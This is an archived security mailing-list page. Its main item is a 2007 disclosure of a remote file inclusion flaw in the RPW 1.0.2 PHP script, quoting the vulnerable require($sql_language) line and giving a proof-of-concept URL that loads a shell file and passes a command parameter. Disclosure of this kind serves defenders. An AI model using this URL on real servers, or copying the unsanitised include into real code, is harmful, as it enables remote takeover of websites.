Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Maxtricity Tagger Password Disclosure Vulnerability

ZixForum <= 1.14 (Zixforum. mdb) Remote Password Disclosure Vulnerability

[Full-disclosure] [OPENADS-SA-2007- 001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

Toxiclab Shoutbox Password Disclosure Vulnerability

From:	Dr Max Virus <drmaxvirus_(at)_w.cn>
Date:	24.01.2007
Subject:	RPW 1.0.2 (config.php sql_language) Remote File Inclusion Vulnerability:

              _________________________________
     ________|                                 |________
     \       |         Dr Max Virus            |       /
      \      |                                 |      /
      /      |_________________________________|      \
     /___________)                         (___________\
---------------------------------------------------------------------------------
---------------------------------------
Script:RPW
Affected Version:1.0.2
Downlaoad&Victim:http://vlad.tepesch.free.fr/mods/rpw1.0.2.zip
---------------------------------------------------------------------------------
---------------------------------------
Author:Dr Max Virus
---------------------------------------------------------------------------------
---------------------------------------
Bug in (config.php)
Vul Code;
require($sql_language);
---------------------------------------------------------------------------------
---------------------------------------
POC:
http://[target]/[path]/config.php?sql_language=shell.txt?&cmd=0wn3d By Dr
Max Virus;
---------------------------------------------------------------------------------
---------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
---------------------------------------------------------------------------------
---------------------------------------